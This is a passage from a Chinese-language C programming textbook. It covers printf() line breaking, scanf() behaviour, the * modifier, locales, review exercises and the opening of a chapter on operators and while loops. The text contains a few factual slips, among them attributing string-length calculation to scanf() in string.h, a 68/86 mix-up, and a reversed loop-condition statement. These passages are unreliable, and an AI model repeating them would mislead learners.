语句执行了两项任务:打印信息和给变量赋值。其次,注意计算针对所有字 符数,包括空格和不可见的换行符(\n)。 3.打印较长的字符串 有时,printf()语句太长,在屏幕上不方便阅读。如果空白(空格、制表 符、换行符)仅用于分隔不同的部分,C 编译器会忽略它们。因此,一条语 句可以写成多行,只需在不同部分之间输入空白即可。例如,程序清单4.13 中的一条printf()语句: printf("The printf() function printed %d characters.\n", rv); 该语句在逗号和 rv之间断行。为了让读者知道该行未完,示例缩进了 rv。C编译器会忽略多余的空白。 但是,不能在双引号括起来的字符串中间断行。如果这样写: printf("The printf() function printed %d characters.\n", rv); C编译器会报错:字符串常量中有非法字符。在字符串中,可以使用\n 来表示换行字符,但是不能通过按下Enter(或Return)键产生实际的换行 符。 给字符串断行有3种方法,如程序清单4.14所示。 程序清单4.14 longstrg.c程序 /* longstrg.c ––打印较长的字符串 */ #include <stdio.h> 215 int main(void) { printf("Here's one way to print a "); printf("long string.\n"); printf("Here's another way to print a \ long string.\n"); printf("Here's the newest way to print a " "long string.\n");  /* ANSI C */ return 0; } 该程序的输出如下: Here's one way to print a long string. Here's another way to print a long string. Here's the newest way to print a long string. 
方法1:使用多个printf()语句。因为第1个字符串没有以\n字符结束,所 以第2个字符串紧跟第1个字符串末尾输出。 方法2:用反斜杠(\)和Enter(或Return)键组合来断行。这使得光标 移至下一行,而且字符串中不会包含换行符。其效果是在下一行继续输出。 但是,下一行代码必须和程序清单中的代码一样从最左边开始。如果缩进该 行,比如缩进5个空格,那么这5个空格就会成为字符串的一部分。 216 方法3:ANSI C引入的字符串连接。在两个用双引号括起来的字符串之 间用空白隔开,C编译器会把多个字符串看作是一个字符串。因此,以下3 种形式是等效的: printf("Hello, young lovers, wherever you are."); printf("Hello, young "   "lovers" ", wherever you are."); printf("Hello, young lovers" ", wherever you are."); 上述方法中,要记得在字符串中包含所需的空格。 如,"young""lovers"会成为"younglovers",而"young " "lovers"才是"young lovers"。 4.4.5 使用scanf() 刚学完输出,接下来我们转至输入——学习scanf()函数。C库包含了多 个输入函数,scanf()是最通用的一个,因为它可以读取不同格式的数据。当 然,从键盘输入的都是文本,因为键盘只能生成文本字符:字母、数字和标 点符号。如果要输入整数 2014,就要键入字符 2、0、1、4。如果要将其储 存为数值而不是字符串,程序就必须把字符依次转换成数值,这就是scanf() 要做的。scanf()把输入的字符串转换成整数、浮点数、字符或字符串,而 printf()正好与它相反,把整数、浮点数、字符和字符串转换成显示在屏幕上 的文本。 scanf()和 printf()类似,也使用格式字符串和参数列表。scanf()中的格式 字符串表明字符输入流的目标数据类型。两个函数主要的区别在参数列表 中。printf()函数使用变量、常量和表达式,而scanf()函数使用指向变量的指 针。这里,读者不必了解如何使用指针,只需记住以下两条简单的规则: 如果用scanf()读取基本变量类型的值,在变量名前加上一个&; 217 如果用scanf()把字符串读入字符数组中,不要使用&。 程序清单4.15中的小程序演示了这两条规则。 程序清单4.15 input.c程序 // input.c -- 何时使用& #include <stdio.h> int main(void) { int age;      // 变量 float assets;   // 变量 char pet[30];   // 字符数组,用于储存字符串 printf("Enter your age, assets, and favorite pet.\n"); scanf("%d %f", &age, &assets); // 这里要使用& scanf("%s", pet);        // 字符数组不使用& printf("%d $%.2f %s\n", age, assets, pet); return 0; } 下面是该程序与用户交互的示例: Enter your age, assets, and favorite pet. 38 218 92360.88 llama 38 $92360.88 llama scanf()函数使用空白(换行符、制表符和空格)把输入分成多个字段。 在依次把转换说明和字段匹配时跳过空白。注意,上面示例的输入项(粗体 部分是用户的输入)分成了两行。只要在每个输入项之间输入至少一个换行 符、空格或制表符即可,可以在一行或多行输入: Enter your age, assets, and favorite pet. 42 2121.45 guppy 42 $2121.45 guppy 唯一例外的是%c转换说明。根据%c,scanf()会读取每个字符,包括空 白。我们稍后详述这部分。 scanf()函数所用的转换说明与printf()函数几乎相同。主要的区别是,对 于float类型和double类型,printf()都使用%f、%e、%E、%g和%G转换说 明。而scanf()只把它们用于float类型,对于double类型时要使用l修饰符。表 4.6列出了C99标准中常用的转换说明。 表4.6 ANSI C中scanf()的转换说明 219 可以在表4.6所列的转换说明中(百分号和转换字符之间)使用修饰 符。如果要使用多个修饰符,必须按表4.7所列的顺序书写。 表4.7 scanf()转换说明中的修饰符 续表 220 如你所见,使用转换说明比较复杂,而且这些表中还省略了一些特性。 省略的主要特性是,从高度格式化源中读取选定数据,如穿孔卡或其他数据 记录。因为在本书中,scanf()主要作为与程序交互的便利工具,所以我们不 在书中讨论更复杂的特性。 1.从scanf()角度看输入 接下来,我们更详细地研究scanf()怎样读取输入。假设scanf()根据一 个%d转换说明读取一个整数。scanf()函数每次读取一个字符,跳过所有的 空白字符,直至遇到第1个非空白字符才开始读取。因为要读取整数,所以 scanf()希望发现一个数字字符或者一个符号(+或-)。如果找到一个数字或 符号,它便保存该字符,并读取下一个字符。如果下一个字符是数字,它便 保存该数字并读取下一个字符。scanf()不断地读取和保存字符,直至遇到非 数字字符。如果遇到一个非数字字符,它便认为读到了整数的末尾。然后, scanf()把非数字字符放回输入。这意味着程序在下一次读取输入时,首先读 到的是上一次读取丢弃的非数字字符。最后,scanf()计算已读取数字(可能 还有符号)相应的数值,并将计算后的值放入指定的变量中。 如果使用字段宽度,scanf()会在字段结尾或第1个空白字符处停止读取 (满足两个条件之一便停止)。 如果第1个非空白字符是A而不是数字,会发生什么情况?scanf()将停在 221 那里,并把A放回输入中,不会把值赋给指定变量。程序在下一次读取输入 时,首先读到的字符是A。如果程序只使用%d转换说明, scanf()就一直无 法越过A读下一个字符。另外,如果使用带多个转换说明的scanf(),C规定 在第1个出错处停止读取输入。 用其他数值匹配的转换说明读取输入和用%d 的情况相同。区别在于 scanf()会把更多字符识别成数字的一部分。例如,%x转换说明要求scanf()识 别十六进制数a~f和A~F。浮点转换说明要求scanf()识别小数点、e记数法 (指数记数法)和新增的p记数法(十六进制指数记数法)。 如果使用%s 转换说明,scanf()会读取除空白以外的所有字符。scanf()跳 过空白开始读取第 1 个非空白字符,并保存非空白字符直到再次遇到空白。 这意味着 scanf()根据%s 转换说明读取一个单词,即不包含空白字符的字符 串。如果使用字段宽度,scanf()在字段末尾或第1个空白字符处停止读取。 无法利用字段宽度让只有一个%s的scanf()读取多个单词。最后要注意一点: 当scanf()把字符串放进指定数组中时,它会在字符序列的末尾加上'\0',让数 组中的内容成为一个C字符串。 实际上,在C语言中scanf()并不是最常用的输入函数。这里重点介绍它 是因为它能读取不同类型的数据。C 语言还有其他的输入函数,如 getchar() 和 fgets()。这两个函数更适合处理一些特殊情况,如读取单个字符或包含空 格的字符串。我们将在第7章、第11章、第13章中讨论这些函数。目前,无 论程序中需要读取整数、小数、字符还是字符串,都可以使用scanf()函数。 2.格式字符串中的普通字符 scanf()函数允许把普通字符放在格式字符串中。除空格字符外的普通字 符必须与输入字符串严格匹配。例如,假设在两个转换说明中添加一个逗 号: scanf("%d,%d", &n, &m); scanf()函数将其解释成:用户将输入一个数字、一个逗号,然后再输入 222 一个数字。也就是说,用户必须像下面这样进行输入两个整数: 88,121 由于格式字符串中,%d后面紧跟逗号,所以必须在输入88后再输入一 
个逗号。但是,由于scanf()会跳过整数前面的空白,所以下面两种输入方式 都可以: 88, 121 和 88, 121 格式字符串中的空白意味着跳过下一个输入项前面的所有空白。例如, 对于下面的语句: scanf("%d ,%d", &n, &m); 以下的输入格式都没问题: 88,121 88 ,121 88 , 121 请注意,“所有空白”的概念包括没有空格的特殊情况。 除了%c,其他转换说明都会自动跳过待输入值前面所有的空白。因 此,scanf("%d%d", &n, &m)与scanf("%d %d", &n, &m)的行为相同。对 于%c,在格式字符串中添加一个空格字符会有所不同。例如,如果把%c放 在格式字符串中的空格前面,scanf()便会跳过空格,从第1个非空白字符开 始读取。也就是说,scanf("%c", &ch)从输入中的第1个字符开始读取,而 223 scanf(" %c", &ch)则从第1个非空白字符开始读取。 3.scanf()的返回值 scanf()函数返回成功读取的项数。如果没有读取任何项,且需要读取一 个数字而用户却输入一个非数值字符串,scanf()便返回0。当scanf()检测 到“文件结尾”时,会返回EOF(EOF是stdio.h中定义的特殊值,通常用 #define指令把EOF定义为-1)。我们将在第6章中讨论文件结尾的相关内容 以及如何利用scanf()的返回值。在读者学会if语句和while语句后,便可使用 scanf()的返回值来检测和处理不匹配的输入。 4.4.6 printf()和scanf()的*修饰符 printf()和scanf()都可以使用*修饰符来修改转换说明的含义。但是,它 们的用法不太一样。首先,我们来看printf()的*修饰符。 如果你不想预先指定字段宽度,希望通过程序来指定,那么可以用*修 饰符代替字段宽度。但还是要用一个参数告诉函数,字段宽度应该是多少。 也就是说,如果转换说明是%*d,那么参数列表中应包含*和 d对应的值。这 个技巧也可用于浮点值指定精度和字段宽度。程序清单4.16演示了相关用 法。 程序清单4.16 varwid.c程序 /* varwid.c -- 使用变宽输出字段 */ #include <stdio.h> int main(void) { unsigned width, precision; int number = 256; 224 double weight = 242.5; printf("Enter a field width:\n"); scanf("%d", &width); printf("The number is :%*d:\n", width, number); printf("Now enter a width and a precision:\n"); scanf("%d %d", &width, &precision); printf("Weight = %*.*f\n", width, precision, weight); printf("Done!\n"); return 0; } 变量width提供字段宽度,number是待打印的数字。因为转换说明中*在 d的前面,所以在printf()的参数列表中,width在number的前面。同样,width 和precision提供打印weight的格式化信息。下面是一个运行示例: Enter a field width: 6 The number is : 256: Now enter a width and a precision: 8 3 Weight = 242.500 Done! 225 这里,用户首先输入6,因此6是程序使用的字段宽度。类似地,接下来 用户输入8和3,说明字段宽度是8,小数点后面显示3位数字。一般而言,程 序应根据weight的值来决定这些变量的值。 scanf()中*的用法与此不同。把*放在%和转换字符之间时,会使得 scanf()跳过相应的输出项。程序清单4.17就是一个例子。 程序清单4.17 skip2.c程序 /* skiptwo.c -- 跳过输入中的前两个整数 */ #include <stdio.h> int main(void) { int n; printf("Please enter three integers:\n"); scanf("%*d %*d %d", &n); printf("The last integer was %d\n", n); return 0; } 程序清单4.17中的scanf()指示:跳过两个整数,把第3个整数拷贝给n。 下面是一个运行示例: Please enter three integers: 2013 2014 2015 226 The last integer was 2015 在程序需要读取文件中特定列的内容时,这项跳过功能很有用。 4.4.7 printf()的用法提示 想把数据打印成列,指定固定字段宽度很有用。因为默认的字段宽度是 待打印数字的宽度,如果同一列中打印的数字位数不同,那么下面的语句: printf("%d %d %d\n", val1, val2, val3); 打印出来的数字可能参差不齐。例如,假设执行3次printf()语句,用户 输入不同的变量,其输出可能是这样: 12 234 1222 4 5 23 22334 2322 10001 使用足够大的固定字段宽度可以让输出整齐美观。例如,若使用下面的 语句: printf("%9d %9d %9d\n", val1, val2, val3); 上面的输出将变成: 12   234   1222 4    5    23 22334   2322   10001 在两个转换说明中间插入一个空白字符,可以确保即使一个数字溢出了 自己的字段,下一个数字也不会紧跟该数字一起输出(这样两个数字看起来 像是一个数字)。这是因为格式字符串中的普通字符(包括空格)会被打印 227 出来。 另一方面,如果要在文字中嵌入一个数字,通常指定一个小于或等于该 数字宽度的字段会比较方便。这样,输出数字的宽度正合适,没有不必要的 空白。例如,下面的语句: printf("Count Beppo ran %.2f miles in 3 hours.\n", distance); 其输出如下: Count Beppo ran 10.22 miles in 3 hours. 如果把转换说明改为%10.2f,则输出如下: Count Beppo ran   10.22 miles in 3 hours. 
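把这两条提示放在一起,下面是一个简短的示意程序(并非书中的程序清单,数值沿用上面的例子):

/* 示意程序:固定字段宽度与嵌入文字中的数字 */
#include <stdio.h>
int main(void)
{
    int val1 = 12, val2 = 234, val3 = 1222;
    double distance = 10.22;

    printf("%9d %9d %9d\n", val1, val2, val3);   /* 足够大的固定字段宽度,打印对齐的数据列 */
    printf("Count Beppo ran %.2f miles in 3 hours.\n", distance);  /* 宽度正合适,没有多余空白 */
    return 0;
}

也就是说,打印数据列时使用较大的固定字段宽度,而在文字中嵌入数字时只指定精度(或较小的宽度)即可。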
本地化设置 美国和世界上的许多地区都使用一个点来分隔十进制值的整数部分和小 数部分,如3.14159。然而,许多其他地区用逗号来分隔,如 3,14159。读者 可能注意到了,printf()和 scanf()都没有提供逗号的转换说明。C语言考虑了 这种情况。本书附录B的参考资料V中介绍了C支持的本地化概念,因此C程 序可以选择特定的本地化设置。例如,如果指定了荷兰语言环境,printf()和 scanf()在显示和读取浮点值时会使用本地惯例(在这种情况下,用逗号代替 点分隔浮点值的整数部分和小数部分)。另外,一旦指定了环境,便可在代 码的数字中使用逗号: double pi = 3,14159; // 荷兰本地化设置 C标准有两个本地化设置:"C"和""(空字符串)。默认情况下,程序使 用"C"本地化设置,基本上符合美国的用法习惯。而""本地化设置可以替换 当前系统中使用的本地语言环境。原则上,这与"C"本地化设置相同。事实 上,大部分操作系统(如UNIX、Linux和Windows)都提供本地化设置选项 列表,只不过它们提供的列表可能不同。 228 4.5 关键概念 C语言用char类型表示单个字符,用字符串表示字符序列。字符常量是 一种字符串形式,即用双引号把字符括起来:"Good luck, my friend"。可以 把字符串储存在字符数组(由内存中相邻的字节组成)中。字符串,无论是 表示成字符常量还是储存在字符数组中,都以一个叫做空字符的隐藏字符结 尾。 在程序中,最好用#define 定义数值常量,用 const 关键字声明的变量为 只读变量。在程序中使用符号常量(明示常量),提高了程序的可读性和可 维护性。 C 语言的标准输入函数(scanf())和标准输出函数(printf())都使用一 种系统。在该系统中,第1个参数中的转换说明必须与后续参数中的值相匹 配。例如,int转换说明%d与一个浮点值匹配会产生奇怪的结果。必须格外 小心,确保转换说明的数量和类型与函数的其余参数相匹配。对于scanf(), 一定要记得在变量名前加上地址运算符(&)。 空白字符(制表符、空格和换行符)在 scanf()处理输入时起着至关重要 的作用。除了%c 模式(读取下一个字符),scanf()在读取输入时会跳过非 空白字符前的所有空白字符,然后一直读取字符,直至遇到空白字符或与正 在读取字符不匹配的字符。考虑一下,如果scanf()根据不同的转换说明读取 相同的输入行,会发生什么情况。假设有如下输入行: -13.45e12# 0 如果其对应的转换说明是%d,scanf()会读取3个字符(-13)并停在小数 点处,小数点将被留在输入中作为下一次输入的首字符。如果其对应的转换 说明是%f,scanf()会读取-13.45e12,并停在#符号处,而#将被留在输入中作 为下一次输入的首字符;然后,scanf()把读取的字符序列-13.45e12转换成相 应的浮点值,并储存在float类型的目标变量中。如果其对应的转换说明 是%s,scanf()会读取-13.45e12#,并停在空格处,空格将被留在输入中作为 229 下一次输入的首字符;然后,scanf()把这 10个字符的字符码储存在目标字符 数组中,并在末尾加上一个空字符。如果其对应的转换说明是%c,scanf() 只会读取并储存第1个字符,该例中是一个空格 [4]。 230 4.6 本章小结 字符串是一系列被视为一个处理单元的字符。在C语言中,字符串是以 空字符(ASCII码是0)结尾的一系列字符。可以把字符串储存在字符数组 中。数组是一系列同类型的项或元素。下面声明了一个名为name、有30个 char类型元素的数组: char name[30]; 要确保有足够多的元素来储存整个字符串(包括空字符)。 字符串常量是用双引号括起来的字符序列,如:"This is an example of a string"。 scanf()函数(声明在string.h头文件中)可用于获得字符串的长度(末尾 的空字符不计算在内)。scanf()函数中的转换说明是%s时,可读取一个单 词。 C预处理器为预处理器指令(以#符号开始)查找源代码程序,并在开 始编译程序之前处理它们。处理器根据#include指令把另一个文件中的内容 添加到该指令所在的位置。#define指令可以创建明示常量(符号常量),即 代表常量的符号。limits.h和float.h头文件用#define定义了一组表示整型和浮 点型不同属性的符号常量。另外,还可以使用const限定符创建定义后就不 能修改的变量。 printf()和scanf()函数对输入和输出提供多种支持。两个函数都使用格式 字符串,其中包含的转换说明表明待读取或待打印数据项的数量和类型。另 外,可以使用转换说明控制输出的外观:字段宽度、小数位和字段内的布 局。 231 4.7 复习题 复习题的参考答案在附录A中。 1.再次运行程序清单 4.1,但是在要求输入名时,请输入名和姓(根据 英文书写习惯,名和姓中间有一个空格),看看会发生什么情况?为什么? 2.假设下列示例都是完整程序中的一部分,它们打印的结果分别是什 么? a.printf("He sold the painting for $%2.2f.\n", 2.345e2); b.printf("%c%c%c\n", 'H', 105, '\41'); c.#define Q "His Hamlet was funny without being vulgar."printf("%s\nhas %d characters.\n", Q, strlen(Q)); d.printf("Is %2.2e the same as %2.2f?\n", 1201.0, 1201.0); 3.在第2题的c中,要输出包含双引号的字符串Q,应如何修改? 4.找出下面程序中的错误。 define B booboo define X 10 main(int) { int age; char name; printf("Please enter your first name."); 232 scanf("%s", name); printf("All right, %c, what's your age?\n", name); scanf("%f", age); xp = age + X; printf("That's a %s! You must be at least %d.\n", B, xp); rerun 0; } 5.假设一个程序的开头是这样: #define BOOK "War and Peace" int main(void) { float cost =12.99; float percent = 80.0; 请构造一个使用BOOK、cost和percent的printf()语句,打印以下内容: This copy of "War and Peace" sells for $12.99. That is 80% of list. 6.打印下列各项内容要分别使用什么转换说明? a.一个字段宽度与位数相同的十进制整数 b.一个形如8A、字段宽度为4的十六进制整数 233 c.一个形如232.346、字段宽度为10的浮点数 d.一个形如2.33e+002、字段宽度为12的浮点数 e.一个字段宽度为30、左对齐的字符串 7.打印下面各项内容要分别使用什么转换说明? a.字段宽度为15的unsigned long类型的整数 b.一个形如0x8a、字段宽度为4的十六进制整数 c.一个形如2.33E+02、字段宽度为12、左对齐的浮点数 d.一个形如+232.346、字段宽度为10的浮点数 e.一个字段宽度为8的字符串的前8个字符 8.打印下面各项内容要分别使用什么转换说明? a.一个字段宽度为6、最少有4位数字的十进制整数 b.一个在参数列表中给定字段宽度的八进制整数 c.一个字段宽度为2的字符 d.一个形如+3.13、字段宽度等于数字中字符数的浮点数 e.一个字段宽度为7、左对齐字符串中的前5个字符 9.分别写出读取下列各输入行的scanf()语句,并声明语句中用到变量和 数组。 a.101 b.22.32 8.34E−09 234 c.linguini d.catch 22 e.catch 22 (但是跳过catch) 10.什么是空白? 
11.下面的语句有什么问题?如何修正? printf("The double type is %z bytes..\n", sizeof(double)); 12.假设要在程序中用圆括号代替花括号,以下方法是否可行? #define ( { #define ) } 235 4.8 编程练习 1.编写一个程序,提示用户输入名和姓,然后以“名,姓”的格式打印出 来。 2.编写一个程序,提示用户输入名和姓,并执行一下操作: a.打印名和姓,包括双引号; b.在宽度为20的字段右端打印名和姓,包括双引号; c.在宽度为20的字段左端打印名和姓,包括双引号; d.在比姓名宽度宽3的字段中打印名和姓。 3.编写一个程序,读取一个浮点数,首先以小数点记数法打印,然后以 指数记数法打印。用下面的格式进行输出(系统不同,指数记数法显示的位 数可能不同): a.输入21.3或2.1e+001; b.输入+21.290或2.129E+001; 4.编写一个程序,提示用户输入身高(单位:英寸)和姓名,然后以下 面的格式显示用户刚输入的信息: Dabney, you are 6.208 feet tall 使用float类型,并用/作为除号。如果你愿意,可以要求用户以厘米为 单位输入身高,并以米为单位显示出来。 5.编写一个程序,提示用户输入以兆位每秒(Mb/s)为单位的下载速度 和以兆字节(MB)为单位的文件大小。程序中应计算文件的下载时间。注 意,这里1字节等于8位。使用float类型,并用/作为除号。该程序要以下面 的格式打印 3 个变量的值(下载速度、文件大小和下载时间),显示小数点 236 后面两位数字: At 18.12 megabits per second, a file of 2.20 megabytes downloads in 0.97 seconds. 6.编写一个程序,先提示用户输入名,然后提示用户输入姓。在一行打 印用户输入的名和姓,下一行分别打印名和姓的字母数。字母数要与相应名 和姓的结尾对齐,如下所示: Melissa Honeybee 7    8 接下来,再打印相同的信息,但是字母个数与相应名和姓的开头对齐, 如下所示: Melissa Honeybee 7    8 7.编写一个程序,将一个double类型的变量设置为1.0/3.0,一个float类 型的变量设置为1.0/3.0。分别显示两次计算的结果各3次:一次显示小数点 后面6位数字;一次显示小数点后面12位数字;一次显示小数点后面16位数 字。程序中要包含float.h头文件,并显示FLT_DIG和DBL_DIG的值。1.0/3.0 的值与这些值一致吗? 8.编写一个程序,提示用户输入旅行的里程和消耗的汽油量。然后计算 并显示消耗每加仑汽油行驶的英里数,显示小数点后面一位数字。接下来, 使用1加仑大约3.785升,1英里大约为1.609千米,把单位是英里/加仑的值转 换为升/100公里(欧洲通用的燃料消耗表示法),并显示结果,显示小数点 后面 1 位数字。注意,美国采用的方案测量消耗单位燃料的行程(值越大越 好),而欧洲则采用单位距离消耗的燃料测量方案(值越低越好)。使用 #define 创建符号常量或使用 const 限定符创建变量来表示两个转换系数。 237 [1].其实,符号常量的概念在K&R合著的《C语言程序设计》中介绍过。但 是,在历年的C标准中(包括最新的C11),并没有符号常量的概念,只提 到过#define最简单的用法是定义一个“明示常量”。市面上各编程书籍对此概 念的理解不同,有些作者把#define宏定义实现的“常量”归为“明示常量”;有 些作者(如,本书的作者)则认为“明示常量”相当于“符号常量”。——译者 注 [2].注意,在C语言中,用const类型限定符声明的是变量,不是常量。—— 译者注 [3].再次提醒读者注意,本书作者认为“明示常量”相当于“符号常量”,经常 在书中混用这两个术语。——译者注 [4].注意,“ -13.45e12# 0”的负号前面有一个空格。——译者注 238 第5章 运算符、表达式和语句 本章介绍以下内容: 关键字:while、typedef 运算符:=、-、*、/、%、++、--、(类型名) C语言的各种运算符,包括用于普通数学运算的运算符 运算符优先级以及语句、表达式的含义 while循环 复合语句、自动类型转换和强制类型转换 如何编写带有参数的函数 现在,读者已经熟悉了如何表示数据,接下来我们学习如何处理数据。 C 语言为处理数据提供了大量的操作,可以在程序中进行算术运算、比较值 的大小、修改变量、逻辑地组合关系等。我们先从基本的算术运算(加、 减、乘、除)开始。 组织程序是处理数据的另一个方面,让程序按正确的顺序执行各个步 骤。C 有许多语言特性,帮助你完成组织程序的任务。循环就是其中一个特 性,本章中你将窥其大概。循环能重复执行行为,让程序更有趣、更强大。 239 5.1 循环简介 程序清单5.1是一个简单的程序示例,该程序进行了简单的运算,计算 穿9码男鞋的脚长(单位:英寸)。为了让读者体会循环的好处,程序的第1 个版本演示了不使用循环编程的局限性。 程序清单5.1 shoes1.c程序 /* shoes1.c -- 把鞋码转换成英寸 */ #include <stdio.h> #define ADJUST 7.31          // 字符常量 int main(void) { const double SCALE = 0.333;// const变量 double shoe, foot; shoe = 9.0; foot = SCALE * shoe + ADJUST; printf("Shoe size (men's)   foot length\n"); printf("%10.1f %15.2f inches\n", shoe, foot); return 0; } 该程序的输出如下: 240 Shoe size (men's) foot length 9.0       10.31 inches 该程序演示了用#define 指令创建符号常量和用 const 限定符创建在程序 运行过程中不可更改的变量。程序使用了乘法和加法,假定用户穿9码的 鞋,以英寸为单位打印用户的脚长。你可能会说:“这太简单了,我用笔算 比敲程序还要快。”说得没错。写出来的程序只使用一次(本例即只根据一 只鞋的尺码计算一次脚长),实在是浪费时间和精力。如果写成交互式程序 会更有用,但是仍无法利用计算机的优势。 应该让计算机做一些重复计算的工作。毕竟,需要重复计算是使用计算 机的主要原因。C 提供多种方法做重复计算,我们在这里简单介绍一种—— while循环。它能让你对运算符做更有趣地探索。程序清单5.2演示了用循环 改进后的程序。 程序清单5.2 shoes2.c程序 /* shoes2.c -- 计算多个不同鞋码对应的脚长 */ #include <stdio.h> #define ADJUST 7.31          // 字符常量 int main(void) { const double SCALE = 0.333;// const变量 double shoe, foot; printf("Shoe size (men's)   foot length\n"); shoe = 3.0; 241 while (shoe < 18.5)      /* while循环开始 */ {               /* 块开始 */ foot = SCALE * shoe + ADJUST; printf("%10.1f %15.2f inches\n", shoe, foot); shoe = shoe + 1.0; }               /* 块结束    */ printf("If the shoe fits, wear it.\n"); return 0; } 下面是shoes2.c程序的输出(...表示并未显示完整,有删节): Shoe size (men's) foot length 3.0       8.31 inches 4.0       8.64 inches 5.0       8.97 inches 6.0       9.31 inches ... 
16.0     12.64 inches 17.0     12.97 inches 18.0     13.30 inches 242 If the shoe fits, wear it. (如果读者对此颇有研究,应该知道该程序不符合实际情况。程序中假 定了一个统一的鞋码系统。) 下面解释一下while循环的原理。当程序第1次到达while循环时,会检查 圆括号中的条件是否为真。该程序中,条件表达式如下: shoe < 18.5 符号<的意思是小于。变量shoe被初始化为3.0,显然小于18.5。因此, 该条件为真,程序进入块中继续执行,把尺码转换成英寸。然后打印计算的 结果。下一条语句把 shoe增加1.0,使shoe的值为4.0: shoe = shoe + 1.0; 此时,程序返回while入口部分检查条件。为何要返回while的入口部 分?因为上面这条语句的下面是右花括号(}),代码使用一对花括号 ({})来标出while循环的范围。花括号之间的内容就是要被重复执行的内 容。花括号以及被花括号括起来的部分被称为块(block)。现在,回到程 序中。因为4小于18.5,所以要重复执行被花括号括起来的所有内容(用计 算机术语来说就是,程序循环这些语句)。该循环过程一直持续到shoe的值 为19.0。此时,由于19.0小于18.5,所以该条件为假: shoe < 18.5 出现这种情况后,控制转到紧跟while循环后面的第1条语句。该例中, 是最后的printf()语句。 可以很方便地修改该程序用于其他转换。例如,把SCALE设置成1.8、 ADJUST设置成32.0,该程序便可把摄氏温度转换成华氏温度;把SCALE设 置成0.6214、ADJUST设置成0,该程序便可把公里转换成英里。注意,修改 了设置后,还要更改打印的消息,以免前后表述不一。 243 通过while循环能便捷灵活地控制程序。现在,我们来学习程序中会用 到的基本运算符。 244 5.2 基本运算符 C用运算符(operator)表示算术运算。例如,+运算符使在它两侧的值 加在一起。如果你觉得术语“运算符”很奇怪,那么请记住东西总得有个名 称。与其叫“那些东西”或“运算处理符”,还不如叫“运算符”。现在,我们介 绍一下用于基本算术运算的运算符:=、+、-、*和/(C 没有指数运算符。 不过,C 的标准数学库提供了一个pow()函数用于指数运算。例如,pow(3.5, 2.2)返回3.5的2.2次幂)。 5.2.1 赋值运算符:= 在C语言中,=并不意味着“相等”,而是一个赋值运算符。下面的赋值 表达式语句: bmw = 2002; 把值2002赋给变量bmw。也就是说,=号左侧是一个变量名,右侧是赋 给该变量的值。符号=被称为赋值运算符。另外,上面的语句不读作“bmw等 于2002”,而读作“把值2002赋给变量bmw”。赋值行为从右往左进行。 也许变量名和变量值的区别看上去微乎其微,但是,考虑下面这条常用 的语句: i = i + 1; 对数学而言,这完全行不通。如果给一个有限的数加上 1,它不可 能“等于”原来的数。但是,在计算机赋值表达式语句中,这很合理。该语句 的意思是:找出变量 i 的值,把该值加 1,然后把新值赋值变量i(见图 5.1)。 245 图5.1 语句i = i + 1; 在C语言中,类似这样的语句没有意义(实际上是无效的): 2002 = bmw; 因为在这种情况下,2002 被称为右值(rvale),只能是字面常量。不 能给常量赋值,常量本身就是它的值。因此,在编写代码时要记住,=号左 侧的项必须是一个变量名。实际上,赋值运算符左侧必须引用一个存储位 置。最简单的方法就是使用变量名。不过,后面章节还会介绍“指针”,可用 于指向一个存储位置。概括地说,C 使用可修改的左值(modifiable lvalue) 标记那些可赋值的实体。也许“可修改的左值”不太好懂,我们再来看一些定 义。 几个术语:数据对象、左值、右值和运算符 赋值表达式语句的目的是把值储存到内存位置上。用于储存值的数据存 储区域统称为数据对象(data object)。C 标准只有在提到这个概念时才会 用到对象这个术语。使用变量名是标识对象的一种方法。除此之外,还有其 他方法,但是要在后面的章节中才学到。例如,可以指定数组的元素、结构 的成员,或者使用指针表达式(指针中储存的是它所指向对象的地址)。左 值(lvalue)是 C 语言的术语,用于标识特定数据对象的名称或表达式。因 此,对象指的是实际的数据存储,而左值是用于标识或定位存储位置的标 签。 对于早期的C语言,提到左值意味着: 1.它指定一个对象,所以引用内存中的地址; 246 2.它可用在赋值运算符的左侧,左值(lvalue)中的l源自left。 但是后来,标准中新增了const限定符。用const创建的变量不可修改。 因此,const标识符满足上面的第1项,但是不满足第2项。一方面C继续把标 识对象的表达式定义为左值,一方面某些左值却不能放在赋值运算符的左 侧。有些左值不能用于赋值运算符的左侧。此时,标准对左值的定义已经不 能满足当前的状况。 为此,C标准新增了一个术语:可修改的左值(modifiable lvalue),用 于标识可修改的对象。所以,赋值运算符的左侧应该是可修改的左值。当前 标准建议,使用术语对象定位值(object locator value)更好。 右值(rvalue)指的是能赋值给可修改左值的量,且本身不是左值。例 如,考虑下面的语句: bmw = 2002; 这里,bmw是可修改的左值,2002是右值。读者也许猜到了,右值中的 r源自right。右值可以是常量、变量或其他可求值的表达式(如,函数调 用)。实际上,当前标准在描述这一概念时使用的是表达式的值(value of an expression),而不是右值。 我们看几个简单的示例: int ex; int why; int zee; const int TWO = 2; why = 42; zee = why; 247 ex = TWO * (why + zee); 这里,ex、why和zee都是可修改的左值(或对象定位值),它们可用于 赋值运算符的左侧和右侧。TWO是不可改变的左值,它只能用于赋值运算 符的右侧(在该例中,TWO被初始化为2,这里的=运算符表示初始化而不 是赋值,因此并未违反规则)。同时,42 是右值,它不能引用某指定内存 位置。另外,why和 zee 是可修改的左值,表达式(why + zee)是右值,该表 达式不能表示特定内存位置,而且也不能给它赋值。它只是程序计算的一个 临时值,在计算完毕后便会被丢弃。 在学习名称时,被称为“项”(如,赋值运算符左侧的项)的就是运算对 象(operand)。运算对象是运算符操作的对象。例如,可以把吃汉堡描述 为:“吃”运算符操作“汉堡”运算对象。类似地可以说,=运算符的左侧运算 对象应该是可修改的左值。 C的基本赋值运算符有些与众不同,请看程序清单5.3。 程序清单5.3 golf.c程序 /* golf.c -- 高尔夫锦标赛记分卡 */ #include <stdio.h> int main(void) { int jane, tarzan, cheeta; cheeta = tarzan = jane = 68; printf("            cheeta  tarzan   jane\n"); printf("First round score %4d %8d %8d\n", cheeta, tarzan,  jane); 248 return 0; } 许多其他语言都会回避该程序中的三重赋值,但是C完全没问题。赋值 的顺序是从右往左:首先把86赋给jane,然后再赋给tarzan,最后赋给 cheeta。因此,程序的输出如下: cheetah  tarzan    jane First round score  68      68      68 5.2.2 加法运算符:+ 加法运算符(addition operator)用于加法运算,使其两侧的值相加。例 如,语句: printf("%d", 4 + 20); 打印的是24,而不是表达式 4 + 20 相加的值(运算对象)可以是变量,也可以是常量。因此,执行下面的 语句: income = salary + bribes; 
